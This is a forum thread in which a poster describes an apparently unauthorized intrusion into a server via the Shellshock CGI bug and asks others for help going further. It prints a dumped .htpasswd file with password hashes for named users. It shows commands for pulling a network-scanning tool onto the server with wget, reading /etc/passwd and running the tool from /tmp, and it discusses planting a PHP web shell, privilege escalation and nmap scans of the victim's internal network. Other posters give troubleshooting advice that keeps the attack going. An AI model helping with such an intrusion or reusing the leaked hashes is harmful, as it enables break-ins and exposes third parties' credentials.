User Controls

Ok guys help me own this network.

  1. #1
    Sophie Pedophile Tech Support
    [FONT=arial]Alright so i haxxed me a server right. I've been on the shellshock tour lately. Pic related.



    I am currently www-data and when i:

    find ~ -print


    I get to see everything that's in var/www, an interesting entry was /var/www/admin/.htpasswd so i cat that puppy.

    avb:$1$72cWtCji$GZEf3ZCzFAZv3ymM.Tp6d.
    art:$1$ea0g1OFr$hyP/aTAbFK8FZq7W.raD3.
    mark:$1$72moiWvx$Q5Dz37CkZJmgt1EPqaYLI/
    arno:$1$6zkzCOkd$dZH69uIQgMu.AyYoV2AsG/
    maniac:$apr1$detoZ/..$sd.wCXYwNRQiIMdwDed6m.
    jan:$1$Rq2d2/ei$7vmzuPa5EKIZd31gjMBVu0
    carlo:$1$2Cc0AsCy$wtA.0TTemsLeiwHkZCBZn/
    bvoet:$1$Q3EipLEg$ejAkYrG9CRlE9.agwqwBd/
    vincent:$1$mkewf0ss$aVL42nI/jxbBjVFoSUMNm.
    gertjan:J.b2evW63skSI
    nicole:$1$HjbU51wO$eVtBAgc9BcdXjt/EUiVsS/
    remco:$1$8QeK8zpH$Pt1j8D0esKSpbfYW.V5IW.
    erik:QltBY50rU8eFo


    Then when i ran:

    dpkg --list


    I saw that they also have a python install, pic related.



    Now would it be possible that i get my PyCat tool onto the server with:


    wget -O /etc/ "https://github.com/NullArray/PyCat/archive/master.zip"


    And then:[/FONT]


    unzip master.zip -d /etc/


    Then run it like:

    python /etc/PyCat.py


    The purpose of this would be to run my script obviously, and my script scans the local network and allows me to interact with any hosts that are up see my repo for details on my tool if you are interested.

    [FONT=arial]https://github.com/NullArray/PyCat

    Alternatively would it be possible to "wget" a php shell to /var/www? And if so, what would be the best way possible to access it after doing so?[/FONT]
  2. #2
    -SpectraL coward [the spuriously bluish-lilac bushman]
    You'd need a data pipe setup.
  3. #3
    Sophie Pedophile Tech Support


    Eh, got my shit on there, yet their python won't run my scripts. Any thoughts anyone?
  4. #4
    You'd need a data pipe setup.
    You need a lobotomy.
  5. #5
    Lanny Bird of Courage


    Eh, got my shit on there, yet their python won't run my scripts. Any thoughts anyone?


    What happens when you try to run your python script? Syntax error probably indicates python 2/3 conflict (the vast majority of prod servers only run 2.x, often a major version or two behind) . If it's "permission denied" then you'll need to set the execution bit on the file (chmod +x PyCat.py), which you should be able to do since you're the file owner.
  6. #6
    -SpectraL coward [the spuriously bluish-lilac bushman]
    I would say it did run, it's just you didn't get the return output.
  7. #7
    Sophie Pedophile Tech Support
    I would say it did run, it's just you didn't get the return output.

    I've considered that, however besides my python script i also was able to get a shellscript on the server to enumerate services, processes, users and cronjobs and that did return output. I think the problem may be that the www-data user doesn't have the privilege to execute things in the directory where python resides. I probably need an exploit to escalate my privilege but, i've been working on that for the last couple hours but haven't been able to do it yet as it's no trivial matter.
  8. #8
    Sophie Pedophile Tech Support
    What happens when you try to run your python script? Syntax error probably indicates python 2/3 conflict (the vast majority of prod servers only run 2.x, often a major version or two behind) . If it's "permission denied" then you'll need to set the execution bit on the file (chmod +x PyCat.py), which you should be able to do since you're the file owner.

    When i try to run the script i just don't get any output at all. No syntax error, no permission denied nothing. Like i said in my post above i don't think i have the privilege to execute python itself.
  9. #9
    Lanny Bird of Courage
    How long does it take to execute on your local? You're using the shellshock through CGI exploit right? Spectral, miracle of miracles, could actually be right here. The webserver will timeout your connection if your process doesn't terminate within a certain timeframe (I think it's in the ballpark of 30 seconds, but depending on how conservative the webmaster is and how much traffic they experience it could be higher or lower).
  10. #10
    Sophie Pedophile Tech Support
    How long does it take to execute on your local?

    What do you mean? How long does the script take to execute on my local machine? Well if i run it, it's done in a second but it will remain scanning until i CTRL+C to interrupt after which it calls my usage function to display my options and help information.

    You're using the shellshock through CGI exploit right?

    Correct.

    Spectral, miracle of miracles, could actually be right here. The webserver will timeout your connection if your process doesn't terminate within a certain timeframe (I think it's in the ballpark of 30 seconds, but depending on how conservative the webmaster is and how much traffic they experience it could be higher or lower).

    Alright but commix the tool i'm using to interact with the webserver through a pseudo-shell always notifies me when the connection gets timed out and i did not see this happen.
  11. #11
    Lanny Bird of Courage
    What do you mean? How long does the script take to execute on my local machine? Well if i run it, it's done in a second but it will remain scanning until i CTRL+C to interrupt after which it calls my usage function to display my options and help information.

    Ahh, that's your issue.

    Alright but commix the tool i'm using to interact with the webserver through a pseudo-shell always notifies me when the connection gets timed out and i did not see this happen.

    So maybe the timeout never comes, but we wouldn't expect to get output either way. CGI's usual execution model is that it maps a url to a file on the server, executes the file (spawns a process) and buffers standard out from that file until the process terminates and then returns all that data as a HTTP response. It's a very unixy way of doing things. Anyway, if you need to send ctrl-C to terminate then your CGI is going to either time out or wait on that process forever. Try doing something like "python PyCat.py > foobar.txt" and after some delay (waiting for your program to produce output) "cat foobar.txt" and you should see your output.
  12. #12
    Sophie Pedophile Tech Support
    Ahh, that's your issue.



    So maybe the timeout never comes, but we wouldn't expect to get output either way. CGI's usual execution model is that it maps a url to a file on the server, executes the file (spawns a process) and buffers standard out from that file until the process terminates and then returns all that data as a HTTP response. It's a very unixy way of doing things. Anyway, if you need to send ctrl-C to terminate then your CGI is going to either time out or wait on that process forever. Try doing something like "python PyCat.py > foobar.txt" and after some delay (waiting for your program to produce output) "cat foobar.txt" and you should see your output.

    Ah yeah, just dump my output then, good call. I'll try that.
  13. #13
    Sophie Pedophile Tech Support
    Well i did it, output.txt was succesfully created but when i cat it it gave no results. However they have an nmap install, i am going to try to use that to scan their local network.
  14. #14
    -SpectraL coward [the spuriously bluish-lilac bushman]
    Like I said, you'd need to create a "pipe" in order to get the return input. This is a situation where the return output does not go to the local machine at all, but is routed remotely instead.
  15. #15
    Sophie Pedophile Tech Support
    Like I said, you'd need to create a "pipe" in order to get the return input. This is a situation where the return output does not go to the local machine at all, but is routed remotely instead.

    I don't think you get what exactly is going on here Spectral. I appreciate you're trying to help but lets break down what's up. I have a connection via a program from my terminal to a bash shell on the server. Any commands i send get run on the server and all output gets retrieved by my program over this connection. Say now for instance i want the output of any command i give saved to a textfile on the server so that i can retrieve it later. What i would do is send a command to append the output to a textfile and that's exactly what i did.

    In example:


    cat /etc/passwd > /tmp/output.txt


    This is going to retrieve for me the entries in 'passwd' and dump it to a textfile on the server in the /tmp/ directory under the name output.txt. then when i want to retrieve the content of the textfile to my own terminal i can use this command:


    cat /tmp/output.txt


    Because i didn't tell the bash shell on the server to save the output to a textfile this time, my program is going to retrieve the contents of output.txt and print it to my own terminal.


    The problem here seemed to be as Lanny pointed out:

    CGI's usual execution model is that it maps a url to a file on the server, executes the file (spawns a process) and buffers standard out from that file until the process terminates and then returns all that data as a HTTP response.

    This is fine, however since the process of my script only terminates on a keyboard interrupt the CGI is going to either time out or wait on that process forever until returning output like Lanny said, so in order to prevent a timeout i have to make it so my program isn't going to be trying to retrieve the output for more than around 30 seconds. This is why i needed to append the output to a textfile that is local to the server. This command was employed to that effect:


    /usr/bin/python /tmp/PyCat.py > /tmp/output.txt


    Then when i listed the contents of the /tmp/ directory on the server i saw that my output file had been succesfully created, however the problem seems to be that the script itself ran but no output was dumped to the textfile. What i also think you may not have realized is that my script was ON the server in the /tmp/ directory after i put it there with the 'wget' command.
  16. #16
    -SpectraL coward [the spuriously bluish-lilac bushman]
    No, it's you who doesn't understand.
  17. #17
    Lanny Bird of Courage
    No, it's you who doesn't understand.

    Spectral tech posts in a nutshell. "NO U!"
  18. #18
    Sophie Pedophile Tech Support
    No, it's you who doesn't understand.

    Instead of saying NO U! Why don't you go ahead and explain to me exactly what's going on in detail and tell me just how wrong i am?

    Protip: You can't.
  19. #19
    -SpectraL coward [the spuriously bluish-lilac bushman]
    It's all about context permissions. You need an app redirect.
  20. #20
    Sophie Pedophile Tech Support
    all about permissions..

    Like i mentioned in this post long before you mentioned it http://niggasin.space/forum/technoph...4374#post44374 i had considered that as well. However the issue from Lanny's post was equally plausible. What's more you have not demonstrated how it is:

    Sophie doesn't understand.

    And that's because i have been right, and perfectly understand what's being discussed here.
Jump to Top